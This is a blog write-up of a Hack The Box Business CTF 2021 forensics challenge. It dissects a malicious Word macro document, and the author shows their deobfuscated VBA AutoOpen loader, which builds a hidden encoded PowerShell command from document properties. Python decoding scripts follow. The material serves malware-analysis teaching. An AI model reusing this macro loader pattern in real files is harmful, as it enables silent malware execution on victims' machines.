# HTB Business CTF 2021: badRansomware

# Introduction

>A wave of phishing emails came in today that seem to be executing some kind of bad ransomware. The triage team said they create encrypted copies of all the files in your Downloads folder, but forgot to delete the originals. Oops. Anyway, see if you can take a closer look and find the flag.

This is a complete write-up for the `badRansomware` challenge at Business CTF 2021 hosted by [Hack The Box](https://www.hackthebox.eu/htb-business-ctf-2021). This article is a part of the [HTB Business CTF 2021 series](https://blog.cyberethical.me/series/htb-business-2021). 

Learn more from additional readings found at the end of the article. I would be thankful if you mention me when using parts of this article in your work. Enjoy!

***
# Contents
1. [Introduction](#introduction)
2. [Basic Information](#basic-information)
3. [Analysis](#analysis)
4. [Second payload](#second-payload)
5. [Third payload](#third-payload)
6. [Additional readings](#additional-readings)
***

# Basic Information

| #   |     |
| :-- | :-- |
|Type    | Jeopardy CTF / Forensics
|Organized  by | [Hack The Box](https://hackthebox.eu/htb-business-ctf-2021/)
|Name    | **HTB Business CTF 2021 / badRansomware**
| CTFtime weight | [24.33](https://ctftime.org/rating-formula/) 
|Solves|147
|Started | 2021/07/23 12:00 UTC
|Ended | 2021/07/25 18:00 UTC
|URLs    | https://ctf.hackthebox.eu/ctf/135
|Author  | **Asentinn** / NetCrawlers
|       | https://ctftime.org/team/159004

%%[patreon-btn]

> 🔔 `CyberEthical.Me` is maintained purely from your donations - consider one-time sponsoring with the [Sponsor](/sponsor) button or 🎁 [become a Patron](https://www.patreon.com/cyberethicalme) which also gives you some bonus perks.

# Analysis

We are provided with the `forensics_badransomware.zip` file.

```
$ unzip forensics_badransomware.zip
$ file badRansomware.docm
```

![2021-07-27-00-14-32.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627855722794/PapZzSG-g.png)

Knowing that [Word documents are archives](https://www.groovypost.com/howto/howto/explore-the-contents-of-a-docx-file-in-windows-7/), I'm extracting the contents of the `*.docm`

```
$ mkdir badRansomware
$ cp badRansomware.docm badRansomware/badRansomware.zip
$ cd badRansomware
$ unzip badRansomware.zip
$ rm badRansomware.zip
$ tree
```

![2021-07-29-14-42-11.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627855738502/QBB2WL0IK.png)

We can see that there are some VBA related files - this document contains a macro.

## VBA Macro

Useful tool to extract the potential malicious code from word files is `olevba` from [oletools](https://github.com/decalage2/oletools/wiki/Install)

```
$ olevba --deobf badRansomware.docm > olevba.out
$ nano olevba.out
```

Now we have the obfuscated VBA code

![2021-07-29-14-46-17.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627855767794/qzbotghbU.png)

I'm copying the content of the macro to the separate file, create a copy of it, and I'm starting to deobfucate. I'm removing all the `Sleep 0` lines and tangent calculations because they are useless. I'm changing the variables names to make it more understandable and fix indentation. This is a result.

```vba
'macro_deobfuscated.vba

Sub AutoOpen()
    Dim someString
    someString = ActiveDocument.Shapes("pelxcitrdd").AlternativeText
    someString = ActiveDocument.Shapes("adaopiwer").AlternativeText & someString
    someString = Split(someString, "@@@")

    Dim iterator
    iterator = 0

    Dim someStringLength
    someStringLength = UBound(someString) - 1

    Dim commandString

    For E = iterator To someStringLength
        Dim singeCharacterFromString
        Dim convertedChar

        singeCharacterFromString = someString(E)
        convertedChar = ChrW(singeCharacterFromString)
        commandString = commandString & convertedChar

    Next

    commandString = "powershell -e IAB" & commandString

    Call Shell(commandString, 0)
End Sub
```

[Back to top](#contents) ⤴

## Entry subroutine

This function (or [subroutine](https://www.homeandlearn.org/excel_vba_subroutines.html)):
1. Take `pelxcitrdd` and `adaopiwer` properties value from the document.
2. Append `pelxcitrdd` to `adaopiwer` (`adaopiwer`+`pelxcitrdd`)

> Note the order of concatenation.

3. Split by `@@@`. This creates an array of strings. 
4. Converted each element in this array using [ChrW](https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/chr-function) function. This means these array elements are Unicode character codes. 
5. Each Unicode character is concatenated in a single long string.
6. Finally, string is passed to the PowerShell as an encoded command.

Now we should look at the other files for `@@@` strings.

```
$ grep -lr "@@@" *
```

> `-l`, display only file names

> `-r`, recursive search

![2021-07-29-16-36-08.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627855836758/s5xpB4HHa.png)

By looking at the content of the `word/document.xml` file, we indeed can see the `pelxcitrdd` and `adaopiwer` properties with the description we are interested in here.

![2021-07-29-16-40-43.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627856117244/Lf_0Jsqyt.png)

Let's copy both contents to the separate files called `pelxcitrdd` and `adaopiwer`.

![2021-07-29-16-42-36.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627856133794/NNrIB7btO.png)

We are ready to assemble the encoded command

```py
#!/bin/python

import sys, string

ct1 = ""
ct2 = ""


with open('pelxcitrdd') as file1:
        ct1 = file1.read().strip()
with open('adaopiwer') as file1:
        ct2 = file1.read().strip()

charCodes = (ct2+ct1).split("@@@")

command = "".join([chr(int(c)) for c in charCodes])

print(command)
```

![2021-07-29-17-33-39.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627856286218/j7QXZ4uEZ.png)

As you can see, we ended up with a redundant `x` character (character code 120). Also don't be misled by being used to see `powershell IEX` commands - the `IAB` is not argument list for PowerShell, but fragment of the PowerShell encoded command!

> I've spent quite a bit on this, thinking what is not right.

So add it to the beginning of the string and decode it from base64. This is a complete script

```py
#!/bin/python

import sys, string, base64

ct1 = ""
ct2 = ""

with open('pelxcitrdd') as file1:
        ct1 = file1.read().strip()
with open('adaopiwer') as file1:
        ct2 = file1.read().strip()

charCodes = (ct2+ct1).split("@@@")
encodedCommand = "".join([chr(int(c)) for c in charCodes]).rstrip("x")
command = base64.b64decode(("IAB"+encodedCommand))

print(command)
```

[Back to top](#contents) ⤴

# Second payload

![2021-07-29-18-01-24.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627856156975/JUlJfw1ii.png)

Now we have to work with a long string and when we look closer these are once again character codes separated by following characters: `XwcIMp}UR%`

To make it a bit easier, I've extracted the string between `IEX` and `split` commands and parsed it using Python script.

```py
#!/bin/python

import re

payload = '/cut/'
charCodes = re.split('X|w|c|I|M|p|}|U|R|%',payload)
encodedCommand = "".join([chr(int(c)) for c in charCodes])

print(encodedCommand)
```

[Back to top](#contents) ⤴

# Third payload

![2021-07-29-18-29-45.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627856183532/t3RyLznj1.png)

This time, we can see we achieved the readable payload - this often means we are finally at the actual malicious code.

Assuming, this is indeed the final payload - because I can see there are some memory streams operation (remember that is a code for software that encrypts files) - I'm trying to look at the script without deobfuscation.

> Also because I don't know how to safely do that automaticaly, if you know, please let me know in the comments.

I've noticed that one value is a bit cryptic, yet familiar:

![2021-07-29-18-44-43.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627856216280/xpS-F7CQQ.png)

By pasting the string format command to the PowerShell and converting the base64 to text in [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true&input=U0ZSQ2UzSTBibk13YlROM2FETlNmUT09) I am able to retrieve the flag.

![2021-07-29-18-46-32.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627856238223/HRGVDAxr6.png)

![2021-07-29-18-46-59.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1627856247999/ViEFyEhMD.png)

[Back to top](#contents) ⤴

# Additional readings

> 📌 Follow the `#CyberEthical` hashtag on the social media

> 🎁 Become a Patron and [gain additional benefits](https://www.patreon.com/cyberethicalme)

> 👉 Instagram: [@cyber.ethical.me](https://www.instagram.com/cyber.ethical.me/)

> 👉 LinkedIn: [Kamil Gierach-Pacanek](https://www.linkedin.com/in/kamilpacanek)

> 👉 Twitter: [@cyberethical_me](https://twitter.com/cyberethical_me)

> 👉 Facebook: [@CyberEthicalMe](https://facebook.com/CyberEthicalMe)

* [VBScript Decoding & Deobfuscating by John Hammond](https://www.youtube.com/watch?v=3Q9-X_NRlJc)


[Back to top](#contents) ⤴
